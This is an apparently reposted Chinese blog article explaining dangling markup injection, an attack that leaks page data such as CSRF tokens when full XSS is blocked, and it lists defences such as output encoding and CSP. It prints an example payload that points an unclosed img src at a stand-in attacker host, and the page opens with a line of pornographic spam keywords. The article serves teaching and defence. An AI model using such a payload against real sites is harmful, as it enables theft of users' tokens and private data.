国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」懸空標(biāo)記注入詳解

這篇具有很好參考價(jià)值的文章主要介紹了「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」懸空標(biāo)記注入詳解。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

引言:什么是懸空標(biāo)記注入(Dangling markup injection)、典型利用原理是什么,以及如何防止懸空標(biāo)記攻擊?

1. 簡(jiǎn)介

懸空標(biāo)記注入(Dangling markup injection)是一種技術(shù),當(dāng)由于輸入過(guò)濾或其他防御措施而無(wú)法進(jìn)行完全的跨站腳本攻擊時(shí),它可以用于捕獲跨域數(shù)據(jù)。它可以被用來(lái)捕獲其他用戶(hù)可見(jiàn)的敏感信息,包括可用于代表用戶(hù)執(zhí)行未經(jīng)授權(quán)操作的CSRF令牌。該技術(shù)常常被用來(lái)執(zhí)行惡意操作并獲得用戶(hù)的數(shù)據(jù)。攻擊者利用這個(gè)技術(shù)通過(guò)構(gòu)造包含特殊標(biāo)記的查詢(xún)字符串,從另一個(gè)域獲取數(shù)據(jù)。

Note:當(dāng)輸入過(guò)濾器或其他防御措施阻止了完全的跨站腳本攻擊時(shí),攻擊者可以利用這個(gè)技術(shù)來(lái)竊取敏感信息。使用這種技術(shù)需要謹(jǐn)慎,可能會(huì)對(duì)網(wǎng)站造成嚴(yán)重的安全風(fēng)險(xiǎn)。

2. 典型注入原理

假設(shè)應(yīng)用程序以不安全的方式將攻擊者可控制的數(shù)據(jù)嵌入其響應(yīng)中:

<input type="text" name="input" value="可控制的輸入

還假設(shè)應(yīng)用程序沒(méi)有過(guò)濾或轉(zhuǎn)義>字符。攻擊者可以使用以下語(yǔ)法打破引用的屬性值和封閉標(biāo)記,并返回HTML上下文:

">

在這種情況下,攻擊者自然會(huì)嘗試執(zhí)行XSS(「 典型安全漏洞系列 」01.XSS攻擊詳解)。但假設(shè)由于輸入篩選器、內(nèi)容安全策略(「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」內(nèi)容安全策略CSP詳解)或其他障礙,常規(guī)XSS攻擊是不可能的。在這里,仍然可以使用如下有效負(fù)載來(lái)提供懸空標(biāo)記注入攻擊:

"><img src='//attacker-website.com?

該有效負(fù)載創(chuàng)建一個(gè)img標(biāo)記,并定義包含攻擊者服務(wù)器上URL的src屬性的開(kāi)頭。但當(dāng)前攻擊者的有效負(fù)載不會(huì)關(guān)閉src屬性,該屬性保留為懸空。當(dāng)瀏覽器解析響應(yīng)時(shí),它將向前看,直到遇到一個(gè)單引號(hào)來(lái)終止屬性。直到該字符之前的所有內(nèi)容都將被視為URL的一部分,并將在URL查詢(xún)字符串內(nèi)發(fā)送到攻擊者的服務(wù)器。任何非字母數(shù)字字符(包括換行符)都將進(jìn)行URL編碼。

攻擊的后果是,攻擊者可以捕獲注入點(diǎn)之后應(yīng)用程序的部分響應(yīng),其中可能包含敏感數(shù)據(jù)。根據(jù)應(yīng)用程序的功能,可能包括CSRF令牌、電子郵件或財(cái)務(wù)數(shù)據(jù)。

Note:任何發(fā)出外部請(qǐng)求的屬性都可以用于懸掛標(biāo)記。

3. 如何防御懸空標(biāo)記注入

  • 輸出編碼:通過(guò)對(duì)輸出數(shù)據(jù)進(jìn)行編碼并在到達(dá)時(shí)驗(yàn)證輸入,可以使用與防止跨站點(diǎn)腳本編寫(xiě)相同的通用防御來(lái)防止懸空標(biāo)記攻擊。

  • 內(nèi)容安全策略:還可以使用內(nèi)容安全策略(CSP)減輕一些懸空標(biāo)記攻擊。例如,可以使用防止標(biāo)記(如img)加載外部資源的策略來(lái)防止部分懸空標(biāo)記攻擊。

Note: Chrome瀏覽器通過(guò)阻止img等標(biāo)記定義包含角括號(hào)和換行符等原始字符的URL來(lái)規(guī)避懸空標(biāo)記攻擊。這將防止攻擊,因?yàn)椴东@的數(shù)據(jù)通常包含這些原始字符,因此攻擊會(huì)被阻止。

4. 參考

[1] https://portswigger.net/web-security/cross-site-scripting/content-security-policy


推薦閱讀:
「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」殺鏈Kill Chain詳解
「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」點(diǎn)擊劫持Clickjacking詳解
「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」內(nèi)容安全策略CSP詳解
「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」靜態(tài)分析結(jié)果交換格式SARIF詳解
「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」安全自動(dòng)化協(xié)議SCAP詳解
「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」通用平臺(tái)枚舉CPE詳解
「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」通用缺陷枚舉CWE詳解
「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」通用漏洞披露CVE詳解
「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」通用漏洞評(píng)分系統(tǒng)CVSS詳解文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-798217.html

到了這里,關(guān)于「 網(wǎng)絡(luò)安全術(shù)語(yǔ)解讀 」懸空標(biāo)記注入詳解的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」安全自動(dòng)化協(xié)議SCAP詳解

    「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」安全自動(dòng)化協(xié)議SCAP詳解

    本文主要介紹什么是SCAP,SCAP的產(chǎn)生背景是怎樣的,SCAP有什么用途,有哪些組件,各個(gè)組件的用途是什么? 由于計(jì)算機(jī)和網(wǎng)絡(luò)技術(shù)的快速發(fā)展,越來(lái)越多的軟件和系統(tǒng)被應(yīng)用到企業(yè)和機(jī)構(gòu)中,這些軟件和系統(tǒng)的安全問(wèn)題也日益凸顯。傳統(tǒng)的安全措施,如防火墻、入侵檢測(cè)等,

    2024年01月23日
    瀏覽(32)
  • 「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」殺鏈Kill Chain詳解

    「 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)解讀 」殺鏈Kill Chain詳解

    早在2009年,Lockheed Martin公司就提出了殺鏈(Kill Chain)理論,現(xiàn)在也稱(chēng)之為攻擊者殺鏈(Attacker Kill Chain)。殺鏈其實(shí)就是攻擊者進(jìn)行網(wǎng)絡(luò)攻擊時(shí)所采取的步驟。殺鏈模型包括7個(gè)步驟: 1偵察 - 2武器化 - 3交付 - 4利用 - 5安裝 - 6命令和控制 - 7針對(duì)目標(biāo)的活動(dòng) 。在第1-6步的任何時(shí)刻進(jìn)

    2024年01月20日
    瀏覽(25)
  • 【網(wǎng)絡(luò)安全】安全常見(jiàn)術(shù)語(yǔ)介紹

    【網(wǎng)絡(luò)安全】安全常見(jiàn)術(shù)語(yǔ)介紹

    介紹 在學(xué)習(xí)信息安全領(lǐng)域時(shí),了解一些常見(jiàn)的術(shù)語(yǔ)是非常重要的。這些術(shù)語(yǔ)涵蓋了各種安全概念和技術(shù),對(duì)保護(hù)個(gè)人和組織的數(shù)字資產(chǎn)至關(guān)重要。本章將介紹一些常見(jiàn)的安全術(shù)語(yǔ),旨在幫助小白用戶(hù)更好地理解和應(yīng)對(duì)不同的安全挑戰(zhàn)。 1. 防火墻(Firewall) 定義 防火墻是一種

    2024年02月02日
    瀏覽(26)
  • 【網(wǎng)絡(luò)安全】-安全常見(jiàn)術(shù)語(yǔ)介紹

    【網(wǎng)絡(luò)安全】-安全常見(jiàn)術(shù)語(yǔ)介紹

    在學(xué)習(xí)信息安全領(lǐng)域時(shí),了解一些常見(jiàn)的術(shù)語(yǔ)是非常重要的。這些術(shù)語(yǔ)涵蓋了各種安全概念和技術(shù),對(duì)保護(hù)個(gè)人和組織的數(shù)字資產(chǎn)至關(guān)重要。本章將介紹一些常見(jiàn)的安全術(shù)語(yǔ),旨在幫助小白用戶(hù)更好地理解和應(yīng)對(duì)不同的安全挑戰(zhàn)。 定義 防火墻是一種網(wǎng)絡(luò)安全設(shè)備,用于監(jiān)控

    2024年02月05日
    瀏覽(28)
  • 網(wǎng)絡(luò)安全(黑客)專(zhuān)業(yè)術(shù)語(yǔ)

    網(wǎng)絡(luò)安全(黑客)專(zhuān)業(yè)術(shù)語(yǔ)

    1.? 肉雞 所謂“肉雞”是一種很形象的比喻,比喻那些可以被攻擊者控制的?電腦、手機(jī)、服務(wù)器或者其他攝像頭、路由器等智能設(shè)備,用于發(fā)?動(dòng)網(wǎng)絡(luò)攻擊 例如在 2016 年美國(guó)東海岸斷網(wǎng)事件中,黑客組織控制了大量的聯(lián)網(wǎng)攝像頭用于發(fā)動(dòng)網(wǎng)絡(luò)攻擊,這些攝像頭則可被稱(chēng)為“

    2024年02月12日
    瀏覽(35)
  • 網(wǎng)絡(luò)安全專(zhuān)業(yè)術(shù)語(yǔ)對(duì)照

    XSS Cross Site Script Attack 跨站腳本攻擊 為了和CSS(層疊樣式表)區(qū)分,故取名XSS CSRF Cross-site request forgery 跨站請(qǐng)求偽造 SSRF Server-Side Request Forgery 服務(wù)器端請(qǐng)求偽造 SQL Structured Query Language 結(jié)構(gòu)化查詢(xún)語(yǔ)言 CTF Capture The Flag 奪旗賽 AWD Attack With Defense 攻防賽 DOS Disk Operating System 磁盤(pán)操

    2024年02月04日
    瀏覽(29)
  • 黑客(網(wǎng)絡(luò)安全)專(zhuān)業(yè)術(shù)語(yǔ)

    1. 肉雞 所謂“肉雞”是一種很形象的比喻,比喻那些可以被攻擊者控制的 電腦、手機(jī)、服務(wù)器或者其他攝像頭、路由器等智能設(shè)備,用于發(fā) 動(dòng)網(wǎng)絡(luò)攻擊 例如在 2016 年美國(guó)東海岸斷網(wǎng)事件中,黑客組織控制了大量的聯(lián)網(wǎng)攝像頭用于發(fā)動(dòng)網(wǎng)絡(luò)攻擊,這些攝像頭則可被稱(chēng)為“肉雞

    2024年02月16日
    瀏覽(24)
  • ?一些常見(jiàn)網(wǎng)絡(luò)安全術(shù)語(yǔ)?

    ?一些常見(jiàn)網(wǎng)絡(luò)安全術(shù)語(yǔ)?

    1、黑帽 為非法目的進(jìn)行黑客攻擊的人,通常是為了經(jīng)濟(jì)利益。他們進(jìn)入安全網(wǎng)絡(luò)以銷(xiāo)毀,贖回,修改或竊取數(shù)據(jù),或使網(wǎng)絡(luò)無(wú)法用于授權(quán)用戶(hù)。這個(gè)名字來(lái)源于這樣一個(gè)事實(shí):老式的黑白西部電影中的惡棍很容易被電影觀眾識(shí)別,因?yàn)樗麄兇┲谏乃固┥?,而“好人”則

    2024年02月11日
    瀏覽(27)
  • 網(wǎng)絡(luò)安全常用術(shù)語(yǔ)

    網(wǎng)絡(luò)安全常用術(shù)語(yǔ)

    肉雞 肉雞指的就是被黑客成功入侵并取得控制權(quán)限的電腦。黑客們可以隨意的控制肉雞,就像在使用自己的電腦一樣,很形象的比喻,就像是養(yǎng)的肉雞,任黑客宰殺和利用。關(guān)鍵的是,在成為肉雞后,只要黑客不對(duì)電腦進(jìn)行破壞,使用者很難發(fā)現(xiàn),有可能就是被養(yǎng)在哪里,隨

    2024年02月02日
    瀏覽(24)
  • Day1--什么是網(wǎng)絡(luò)安全?網(wǎng)絡(luò)安全常用術(shù)語(yǔ)

    Day1--什么是網(wǎng)絡(luò)安全?網(wǎng)絡(luò)安全常用術(shù)語(yǔ)

    目錄 1. 什么是網(wǎng)絡(luò)安全? 信息系統(tǒng)(Information System) 信息系統(tǒng)安全三要素(CIA) 網(wǎng)絡(luò)空間安全管理流程 網(wǎng)絡(luò)安全管理 2. 網(wǎng)絡(luò)安全的常用術(shù)語(yǔ) 3. 網(wǎng)絡(luò)安全形勢(shì) 4. 中國(guó)網(wǎng)絡(luò)安全產(chǎn)業(yè)現(xiàn)狀 ? ? ? ? 網(wǎng)絡(luò)空間安全包括了國(guó)家安全、城市安全、經(jīng)濟(jì)安全、社會(huì)安全、生產(chǎn)安全、人

    2024年04月25日
    瀏覽(21)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包